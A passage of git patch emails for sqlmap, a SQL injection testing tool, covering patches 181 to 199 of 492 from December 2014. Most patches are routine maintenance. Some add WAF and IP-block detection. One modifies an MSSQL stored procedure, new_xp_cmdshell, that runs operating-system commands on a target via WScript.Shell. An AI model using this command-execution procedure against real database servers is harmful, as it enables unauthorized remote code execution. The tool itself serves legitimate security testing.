 # Chunk length (in items) used by BigArray objects (only last chunk and cached one are held in memory)
 BIGARRAY_CHUNK_LENGTH = 4096
 
+# Prefix used for storing dumped chunks in BigArray objects
+BIGARRAY_TEMP_PREFIX = "sqlmapba-%d-" % os.getpid()
+
 # Only console display last n table rows
 TRIM_STDOUT_DUMP_SIZE = 256
 
diff --git a/sqlmap.py b/sqlmap.py
index 6a4683881..025fc1b3a 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -6,11 +6,13 @@ See the file 'doc/COPYING' for copying permission
 """
 
 import bdb
+import glob
 import inspect
 import logging
 import os
 import re
 import sys
+import tempfile
 import time
 import traceback
 import warnings
@@ -42,6 +44,7 @@ from lib.core.exception import SqlmapUserQuitException
 from lib.core.option import initOptions
 from lib.core.option import init
 from lib.core.profiling import profile
+from lib.core.settings import BIGARRAY_TEMP_PREFIX
 from lib.core.settings import LEGAL_DISCLAIMER
 from lib.core.testing import smokeTest
 from lib.core.testing import liveTest
@@ -151,6 +154,12 @@ def main():
         if conf.get("showTime"):
             dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True)
 
+        for filename in glob.glob("%s*" % os.path.join(tempfile.gettempdir(), BIGARRAY_TEMP_PREFIX)):
+            try:
+                os.remove(filename)
+            except:
+                pass
+
         kb.threadContinue = False
         kb.threadException = True
 

From 7a04595f5eb3d63c2823efd502d28d01dfb09736 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 1 Dec 2014 11:15:45 +0100
Subject: [PATCH 181/492] Added a reference url (http charset priority)

---
 lib/request/basic.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/request/basic.py b/lib/request/basic.py
index 72a5b03f7..25e6a093a 100755
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -258,7 +258,7 @@ def decodePage(page, contentEncoding, contentType):
 
         if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset)))\
             or (httpCharset == metaCharset and all((httpCharset, metaCharset))):
-            kb.pageEncoding = httpCharset or metaCharset
+            kb.pageEncoding = httpCharset or metaCharset  # Reference: http://bytes.com/topic/html-css/answers/154758-http-equiv-vs-true-header-has-precedence
             debugMsg = "declared web page charset '%s'" % kb.pageEncoding
             singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg)
         else:

From e03aaa75421c0266884f8e53f8229b91485e487d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 2 Dec 2014 10:23:10 +0100
Subject: [PATCH 182/492] Patch for an Issue #982

---
 lib/utils/hash.py | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index 4e42bb769..709bcd281 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -19,7 +19,11 @@ try:
 except (ImportError, OSError):
     pass
 else:
-    _multiprocessing = multiprocessing
+    try:
+        if multiprocessing.cpu_count() > 1:
+            _multiprocessing = multiprocessing
+    except NotImplementedError:
+        pass
 
 import gc
 import os

From 636e0588d5f90a2498966599787ae89a6eca7ee4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 2 Dec 2014 10:29:09 +0100
Subject: [PATCH 183/492] Patch for an Issue #981

---
 plugins/generic/filesystem.py | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py
index 9c4a949b9..cdfbd20cc 100644
--- a/plugins/generic/filesystem.py
+++ b/plugins/generic/filesystem.py
@@ -10,6 +10,7 @@ import os
 from lib.core.agent import agent
 from lib.core.common import dataToOutFile
 from lib.core.common import Backend
+from lib.core.common import checkFile
 from lib.core.common import decloakToTemp
 from lib.core.common import decodeHexValue
 from lib.core.common import isNumPosStrValue
@@ -256,6 +257,8 @@ class Filesystem:
     def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
         written = False
 
+        checkFile(localFile)
+
         self.checkDbmsOs()
 
         if localFile.endswith('_'):

From 2358e34bb8b9f5ff82403a0da1714d4c0dd6a2f5 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 2 Dec 2014 10:50:15 +0100
Subject: [PATCH 184/492] Minor refactoring

---
 lib/parse/banner.py  | 3 ---
 lib/parse/headers.py | 2 --
 lib/parse/html.py    | 2 --
 3 files changed, 7 deletions(-)

diff --git a/lib/parse/banner.py b/lib/parse/banner.py
index 2e11cb10c..74ee36840 100644
--- a/lib/parse/banner.py
+++ b/lib/parse/banner.py
@@ -9,7 +9,6 @@ import re
 
 from xml.sax.handler import ContentHandler
 
-from lib.core.common import checkFile
 from lib.core.common import Backend
 from lib.core.common import parseXmlFile
 from lib.core.common import sanitizeStr
@@ -104,8 +103,6 @@ def bannerParser(banner):
     if not xmlfile:
         return
 
-    checkFile(xmlfile)
-
     if Backend.isDbms(DBMS.MSSQL):
         handler = MSSQLBannerHandler(banner, kb.bannerFp)
         parseXmlFile(xmlfile, handler)
diff --git a/lib/parse/headers.py b/lib/parse/headers.py
index 1cb08db7d..1f6b740e0 100644
--- a/lib/parse/headers.py
+++ b/lib/parse/headers.py
@@ -8,7 +8,6 @@ See the file 'doc/COPYING' for copying permission
 import itertools
 import os
 
-from lib.core.common import checkFile
 from lib.core.common import parseXmlFile
 from lib.core.data import kb
 from lib.core.data import paths
@@ -36,7 +35,6 @@ def headersParser(headers):
     for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers):
         value = headers[header]
         xmlfile = kb.headerPaths[header]
-        checkFile(xmlfile)
 
         handler = FingerprintHandler(value, kb.headersFp)
 
diff --git a/lib/parse/html.py b/lib/parse/html.py
index 71fc988d5..51a7708c2 100644
--- a/lib/parse/html.py
+++ b/lib/parse/html.py
@@ -9,7 +9,6 @@ import re
 
 from xml.sax.handler import ContentHandler
 
-from lib.core.common import checkFile
 from lib.core.common import parseXmlFile
 from lib.core.data import kb
 from lib.core.data import paths
@@ -49,7 +48,6 @@ def htmlParser(page):
     """
 
     xmlfile = paths.ERRORS_XML
-    checkFile(xmlfile)
     handler = HTMLHandler(page)
 
     parseXmlFile(xmlfile, handler)

From e4b00bdbcb6c296025b24d271ac351356e75a204 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 2 Dec 2014 10:57:50 +0100
Subject: [PATCH 185/492] Patch for an Issue #983

---
 lib/core/common.py | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 4b40747a0..04503433c 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -40,6 +40,7 @@ from subprocess import PIPE
 from subprocess import Popen as execute
 from xml.dom import minidom
 from xml.sax import parse
+from xml.sax import SAXParseException
 
 from extra.cloak.cloak import decloak
 from extra.safe2bin.safe2bin import safecharencode
@@ -77,6 +78,7 @@ from lib.core.enums import SORT_ORDER
 from lib.core.exception import SqlmapDataException
 from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapNoneDataException
+from lib.core.exception import SqlmapInstallationException
 from lib.core.exception import SqlmapMissingDependence
 from lib.core.exception import SqlmapSilentQuitException
 from lib.core.exception import SqlmapSyntaxException
@@ -1758,8 +1760,14 @@ def parseXmlFile(xmlFile, handler):
     Parses XML file by a given handler
     """
 
-    with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream:
-        parse(stream, handler)
+    try:
+        with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream:
+            parse(stream, handler)
+    except (SAXParseException, UnicodeError), ex:
+        errMsg = "something seems to be wrong with "
+        errMsg += "the file '%s' ('%s'). Please make " % (xmlFile, ex)
+        errMsg += "sure that you haven't made any changes to it"
+        raise SqlmapInstallationException, errMsg
 
 def getSQLSnippet(dbms, sfile, **variables):
     """

From 821e4bf507fae7ef77d13fadd3699927ad4458bb Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 3 Dec 2014 08:46:02 +0100
Subject: [PATCH 186/492] Patch for an Issue #987

---
 plugins/generic/users.py | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/plugins/generic/users.py b/plugins/generic/users.py
index 1e7043c53..a65f51331 100644
--- a/plugins/generic/users.py
+++ b/plugins/generic/users.py
@@ -103,7 +103,9 @@ class Users:
             if not isNoneValue(values):
                 kb.data.cachedUsers = []
                 for value in arrayizeValue(values):
-                    kb.data.cachedUsers.append(unArrayizeValue(value))
+                    value = unArrayizeValue(value)
+                    if not isNoneValue(value):
+                        kb.data.cachedUsers.append(value)
 
         if not kb.data.cachedUsers and isInferenceAvailable() and not conf.direct:
             infoMsg = "fetching number of database users"

From 17db587e2cefb3e70a06a8c3c289799dc834514b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 3 Dec 2014 10:06:21 +0100
Subject: [PATCH 187/492] Adding some friendly warning messages (regarding
 blocking)

---
 lib/core/common.py   | 4 ++++
 lib/core/settings.py | 5 ++++-
 lib/request/basic.py | 7 +++++++
 3 files changed, 15 insertions(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 04503433c..eac6f812c 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2832,6 +2832,10 @@ def showHttpErrorCodes():
           if code in httplib.responses else '?', count) \
           for code, count in kb.httpErrorCodes.items())
         logger.warn(warnMsg)
+        if any(str(_).startswith('4') or str(_).startswith('5') for _ in kb.httpErrorCodes.keys()):
+            msg = "too many 4xx and/or 5xx HTTP error codes "
+            msg += "usually means that some kind of protection is involved (e.g. WAF)"
+            logger.warn(msg)
 
 def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace"):
     """
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 63929d00d..002bec0ad 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -79,6 +79,9 @@ TEXT_TAG_REGEX = r"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|fo
 # Regular expression used for recognition of IP addresses
 IP_ADDRESS_REGEX = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"
 
+# Regular expression used for recognition of generic "your ip has been blocked" messages
+BLOCKED_IP_REGEX = r"(?i)(\A|\b)ip\b.*\b(banned|blocked|block list|firewall)"
+
 # Dumping characters used in GROUP_CONCAT MySQL technique
 CONCAT_ROW_DELIMITER = ','
 CONCAT_VALUE_DELIMITER = '|'
@@ -541,7 +544,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
 CHECK_ZERO_COLUMNS_THRESHOLD = 10
 
 # Boldify all logger messages containing these "patterns"
-BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github")
+BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved")
 
 # Generic www root directory names
 GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
diff --git a/lib/request/basic.py b/lib/request/basic.py
index 25e6a093a..d89ab5b29 100755
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -27,6 +27,7 @@ from lib.core.data import logger
 from lib.core.enums import HTTP_HEADER
 from lib.core.enums import PLACE
 from lib.core.exception import SqlmapCompressionException
+from lib.core.settings import BLOCKED_IP_REGEX
 from lib.core.settings import DEFAULT_COOKIE_DELIMITER
 from lib.core.settings import EVENTVALIDATION_REGEX
 from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
@@ -305,6 +306,8 @@ def decodePage(page, contentEncoding, contentType):
 def processResponse(page, responseHeaders):
     kb.processResponseCounter += 1
 
+    page = page or ""
+
     parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None)
 
     if conf.parseErrors:
@@ -323,3 +326,7 @@ def processResponse(page, responseHeaders):
                         continue
                     conf.paramDict[PLACE.POST][name] = value
                 conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST])
+
+    if re.search(BLOCKED_IP_REGEX, page):
+        errMsg = "it appears that you have been blocked by the target server"
+        singleTimeLogMessage(errMsg, logging.ERROR)

From aa95a05477763f357d7ac614038ec84a8f6df1a7 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 3 Dec 2014 13:14:06 +0100
Subject: [PATCH 188/492] Minor update

---
 lib/core/common.py | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index eac6f812c..97bd7632e 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2832,10 +2832,11 @@ def showHttpErrorCodes():
           if code in httplib.responses else '?', count) \
           for code, count in kb.httpErrorCodes.items())
         logger.warn(warnMsg)
-        if any(str(_).startswith('4') or str(_).startswith('5') for _ in kb.httpErrorCodes.keys()):
-            msg = "too many 4xx and/or 5xx HTTP error codes "
-            msg += "usually means that some kind of protection is involved (e.g. WAF)"
-            logger.warn(msg)
+        if not kb.injections:
+            if any(str(_).startswith('4') or str(_).startswith('5') for _ in kb.httpErrorCodes.keys()):
+                msg = "too many 4xx and/or 5xx HTTP error codes "
+                msg += "could mean that some kind of protection is involved (e.g. WAF)"
+                logger.warn(msg)
 
 def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace"):
     """

From d3060f20d77197f168648ca0ffa7e54c70fc59c4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 3 Dec 2014 13:22:55 +0100
Subject: [PATCH 189/492] Minor improvement

---
 lib/core/common.py     | 2 +-
 lib/request/connect.py | 3 ++-
 2 files changed, 3 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 97bd7632e..08c95cd24 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2833,7 +2833,7 @@ def showHttpErrorCodes():
           for code, count in kb.httpErrorCodes.items())
         logger.warn(warnMsg)
         if not kb.injections:
-            if any(str(_).startswith('4') or str(_).startswith('5') for _ in kb.httpErrorCodes.keys()):
+            if any((str(_).startswith('4') or str(_).startswith('5')) and _ != httplib.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes.keys()):
                 msg = "too many 4xx and/or 5xx HTTP error codes "
                 msg += "could mean that some kind of protection is involved (e.g. WAF)"
                 logger.warn(msg)
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 997e307a1..77464bc44 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -476,8 +476,9 @@ class Connect(object):
                 page = page if isinstance(page, unicode) else getUnicode(page)
 
             code = e.code
-            threadData.lastHTTPError = (threadData.lastRequestUID, code)
 
+            kb.originalCode = kb.originalCode or code
+            threadData.lastHTTPError = (threadData.lastRequestUID, code)
             kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1
 
             status = getUnicode(e.msg)

From a3507d65fd352c6f2988b6a4ed0683dd0005e59a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 4 Dec 2014 09:34:37 +0100
Subject: [PATCH 190/492] Minor update

---
 lib/core/common.py | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 08c95cd24..f2beec5d5 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2832,11 +2832,10 @@ def showHttpErrorCodes():
           if code in httplib.responses else '?', count) \
           for code, count in kb.httpErrorCodes.items())
         logger.warn(warnMsg)
-        if not kb.injections:
-            if any((str(_).startswith('4') or str(_).startswith('5')) and _ != httplib.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes.keys()):
-                msg = "too many 4xx and/or 5xx HTTP error codes "
-                msg += "could mean that some kind of protection is involved (e.g. WAF)"
-                logger.warn(msg)
+        if any((str(_).startswith('4') or str(_).startswith('5')) and _ != httplib.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes.keys()):
+            msg = "too many 4xx and/or 5xx HTTP error codes "
+            msg += "could mean that some kind of protection is involved (e.g. WAF)"
+            logger.warn(msg)
 
 def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace"):
     """

From 9b32e69f26004006b66a5c034c4961933d528bdd Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 4 Dec 2014 10:06:15 +0100
Subject: [PATCH 191/492] Adding new WAF script (UrlScan)

---
 lib/controller/checks.py |  5 +++++
 lib/core/enums.py        |  1 +
 waf/urlscan.py           | 24 ++++++++++++++++++++++++
 3 files changed, 30 insertions(+)
 create mode 100644 waf/urlscan.py

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 29f4ffda3..9172904b5 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -54,6 +54,7 @@ from lib.core.enums import HTTPMETHOD
 from lib.core.enums import NULLCONNECTION
 from lib.core.enums import PAYLOAD
 from lib.core.enums import PLACE
+from lib.core.enums import REDIRECTION
 from lib.core.exception import SqlmapConnectionException
 from lib.core.exception import SqlmapNoneDataException
 from lib.core.exception import SqlmapSilentQuitException
@@ -1163,6 +1164,8 @@ def identifyWaf():
     def _(*args, **kwargs):
         page, headers, code = None, None, None
         try:
+            pushValue(kb.redirectChoice)
+            kb.redirectChoice = REDIRECTION.NO
             if kwargs.get("get"):
                 kwargs["get"] = urlencode(kwargs["get"])
             kwargs["raise404"] = False
@@ -1170,6 +1173,8 @@ def identifyWaf():
             page, headers, code = Request.getPage(*args, **kwargs)
         except Exception:
             pass
+        finally:
+            kb.redirectChoice = popValue()
         return page or "", headers or {}, code
 
     retVal = False
diff --git a/lib/core/enums.py b/lib/core/enums.py
index 80cab9474..848678487 100644
--- a/lib/core/enums.py
+++ b/lib/core/enums.py
@@ -166,6 +166,7 @@ class HTTP_HEADER:
     COOKIE = "Cookie"
     SET_COOKIE = "Set-Cookie"
     HOST = "Host"
+    LOCATION = "Location"
     PRAGMA = "Pragma"
     PROXY_AUTHORIZATION = "Proxy-Authorization"
     PROXY_CONNECTION = "Proxy-Connection"
diff --git a/waf/urlscan.py b/waf/urlscan.py
new file mode 100644
index 000000000..0e0fc8e3e
--- /dev/null
+++ b/waf/urlscan.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import HTTP_HEADER
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "UrlScan (Microsoft)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = re.search(r"Rejected-By-UrlScan", headers.get(HTTP_HEADER.LOCATION, ""), re.I) is not None
+        if retval:
+            break
+
+    return retval

From 56965e3608981d9d8434f12bf83cd693d6bd90b1 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 4 Dec 2014 13:36:41 +0100
Subject: [PATCH 192/492] Patch for an Issue #990

---
 lib/utils/hash.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index 709bcd281..a657f4fee 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -840,7 +840,7 @@ def dictionaryAttack(attack_dict):
                         try:
                             process.terminate()
                             process.join()
-                        except OSError:
+                        except (OSError, AttributeError):
                             pass
 
                 finally:
@@ -934,7 +934,7 @@ def dictionaryAttack(attack_dict):
                             try:
                                 process.terminate()
                                 process.join()
-                            except OSError:
+                            except (OSError, AttributeError):
                                 pass
 
                     finally:

From 7673f3e045fe1c3466a508eb1f5bcd09413e5a6d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 5 Dec 2014 11:15:33 +0100
Subject: [PATCH 193/492] Minor style update

---
 lib/core/common.py | 2 +-
 lib/utils/deps.py  | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index f2beec5d5..3816d1441 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1212,7 +1212,7 @@ def parseTargetDirect():
                     pass
                 else:
                     errMsg = "sqlmap requires '%s' third-party library " % data[1]
-                    errMsg += "in order to directly connect to the database "
+                    errMsg += "in order to directly connect to the DBMS "
                     errMsg += "%s. You can download it from '%s'" % (dbmsName, data[2])
                     errMsg += ". Alternative is to use a package 'python-sqlalchemy' "
                     errMsg += "with support for dialect '%s' installed" % data[3]
diff --git a/lib/utils/deps.py b/lib/utils/deps.py
index b0184d911..c7f86e512 100644
--- a/lib/utils/deps.py
+++ b/lib/utils/deps.py
@@ -46,7 +46,7 @@ def checkDependencies():
                 import jpype
         except ImportError:
             warnMsg = "sqlmap requires '%s' third-party library " % data[1]
-            warnMsg += "in order to directly connect to the database "
+            warnMsg += "in order to directly connect to the DBMS "
             warnMsg += "%s. Download from %s" % (dbmsName, data[2])
             logger.warn(warnMsg)
             missing_libraries.add(data[1])

From 034fae0f47319735a2bb7b00a3097c5355b8978e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 5 Dec 2014 11:24:43 +0100
Subject: [PATCH 194/492] Patch for an Issue #992

---
 lib/controller/handler.py | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/lib/controller/handler.py b/lib/controller/handler.py
index 702215e7c..13b570442 100644
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -93,7 +93,10 @@ def setHandler():
                 if sqlalchemy.connector:
                     conf.dbmsConnector = sqlalchemy
                 else:
-                    conf.dbmsConnector.connect()
+                    try:
+                        conf.dbmsConnector.connect()
+                    except NameError:
+                        pass
             else:
                 conf.dbmsConnector.connect()
 

From d726050bc4d136f3e5e57883022b34f78c7ea96d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 5 Dec 2014 11:46:03 +0100
Subject: [PATCH 195/492] Patch for an Issue #991

---
 lib/utils/hashdb.py | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py
index 9c42cf884..d0e57c3df 100644
--- a/lib/utils/hashdb.py
+++ b/lib/utils/hashdb.py
@@ -139,8 +139,15 @@ class HashDB(object):
     def beginTransaction(self):
         threadData = getCurrentThreadData()
         if not threadData.inTransaction:
-            self.cursor.execute("BEGIN TRANSACTION")
-            threadData.inTransaction = True
+            try:
+                self.cursor.execute("BEGIN TRANSACTION")
+            except:
+                # Reference: http://stackoverflow.com/a/25245731
+                self.cursor.close()
+                threadData.hashDBCursor = None
+                self.cursor.execute("BEGIN TRANSACTION")
+            finally:
+                threadData.inTransaction = True
 
     def endTransaction(self):
         threadData = getCurrentThreadData()

From bd99470a4ab2983b52ea790bd2db6a10f0a625b0 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 5 Dec 2014 22:01:59 +0100
Subject: [PATCH 196/492] Minor update to cleanup properly new xp_cmdshell

---
 lib/takeover/xp_cmdshell.py                  | 5 ++---
 plugins/generic/misc.py                      | 2 +-
 procs/mssqlserver/create_new_xp_cmdshell.sql | 2 +-
 3 files changed, 4 insertions(+), 5 deletions(-)

diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index 706863ca0..5ab26f6a2 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -52,10 +52,9 @@ class Xp_cmdshell:
             inject.goStacked(agent.runAsDBMSUser(cmd))
 
         self._randStr = randomStr(lowercase=True)
-        self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
-        self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew
+        self.xpCmdshellStr = "master..new_xp_cmdshell"
 
-        cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr, XP_CMDSHELL_NEW=self._xpCmdshellNew)
+        cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr)
 
         if Backend.isVersionWithin(("2005", "2008")):
             cmd += ";RECONFIGURE WITH OVERRIDE"
diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py
index f62e17ebf..cc2b38599 100644
--- a/plugins/generic/misc.py
+++ b/plugins/generic/misc.py
@@ -162,7 +162,7 @@ class Miscellaneous:
             inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True)
 
             if Backend.isDbms(DBMS.MSSQL):
-                return
+                udfDict = {"master..new_xp_cmdshell": None}
 
             if udfDict is None:
                 udfDict = self.sysUdfs
diff --git a/procs/mssqlserver/create_new_xp_cmdshell.sql b/procs/mssqlserver/create_new_xp_cmdshell.sql
index 913f368c1..005730860 100644
--- a/procs/mssqlserver/create_new_xp_cmdshell.sql
+++ b/procs/mssqlserver/create_new_xp_cmdshell.sql
@@ -1,3 +1,3 @@
 DECLARE @%RANDSTR% nvarchar(999);
-set @%RANDSTR%='CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
+set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
 EXEC master..sp_executesql @%RANDSTR%

From ff0dd8eefedb19c4ce58e9a57e1598ee71b39ed6 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 6 Dec 2014 21:40:52 +0100
Subject: [PATCH 197/492] Patch for an Issue #997

---
 thirdparty/multipart/multipartpost.py | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/thirdparty/multipart/multipartpost.py b/thirdparty/multipart/multipartpost.py
index b3ea1eebd..2863b8580 100644
--- a/thirdparty/multipart/multipartpost.py
+++ b/thirdparty/multipart/multipartpost.py
@@ -88,7 +88,11 @@ class MultipartPostHandler(urllib2.BaseHandler):
         for (key, fd) in files:
             file_size = os.fstat(fd.fileno())[stat.ST_SIZE] if isinstance(fd, file) else fd.len
             filename = fd.name.split('/')[-1] if '/' in fd.name else fd.name.split('\\')[-1]
-            contenttype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
+            try:
+                contenttype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
+            except:
+                # Reference: http://bugs.python.org/issue9291
+                contenttype = 'application/octet-stream'
             buf += '--%s\r\n' % boundary
             buf += 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (key, filename)
             buf += 'Content-Type: %s\r\n' % contenttype

From 4325f21b58e9324a086bb39a90b95e15a0d1463c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 7 Dec 2014 07:48:46 +0100
Subject: [PATCH 198/492] Update for an Issue #996

---
 doc/COPYING | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/doc/COPYING b/doc/COPYING
index a8ccaaa4d..eb876f56c 100644
--- a/doc/COPYING
+++ b/doc/COPYING
@@ -5,8 +5,8 @@ sqlmap is (C) 2006-2014 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
 
 This program is free software; you may redistribute and/or modify it under
 the terms of the GNU General Public License as published by the Free
-Software Foundation; Version 2 with the clarifications and exceptions
-described below. This guarantees your right to use, modify, and
+Software Foundation; Version 2 (or later) with the clarifications and
+exceptions described below. This guarantees your right to use, modify, and
 redistribute this software under certain conditions. If you wish to embed
 sqlmap technology into proprietary software, we sell alternative licenses
 (contact sales@sqlmap.org).

From 0d931a7b0990f49ae91770ae324d4bcc7fadff40 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 7 Dec 2014 15:55:22 +0100
Subject: [PATCH 199/492] Fix for an Issue #999

---
 lib/core/common.py | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 3816d1441..6bbd9c2b5 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1171,7 +1171,7 @@ def parseTargetDirect():
         raise SqlmapSyntaxException(errMsg)
 
     for dbmsName, data in DBMS_DICT.items():
-        if conf.dbms in data[0]:
+        if dbmsName == conf.dbms or conf.dbms.lower() in data[0]:
             try:
                 if dbmsName in (DBMS.ACCESS, DBMS.SQLITE, DBMS.FIREBIRD):
                     if remote:
@@ -1182,7 +1182,9 @@ def parseTargetDirect():
                         conf.hostname = "localhost"
                         conf.port = 0
                 elif not remote:
-                    errMsg = "missing remote connection details"
+                    errMsg = "missing remote connection details (e.g. "
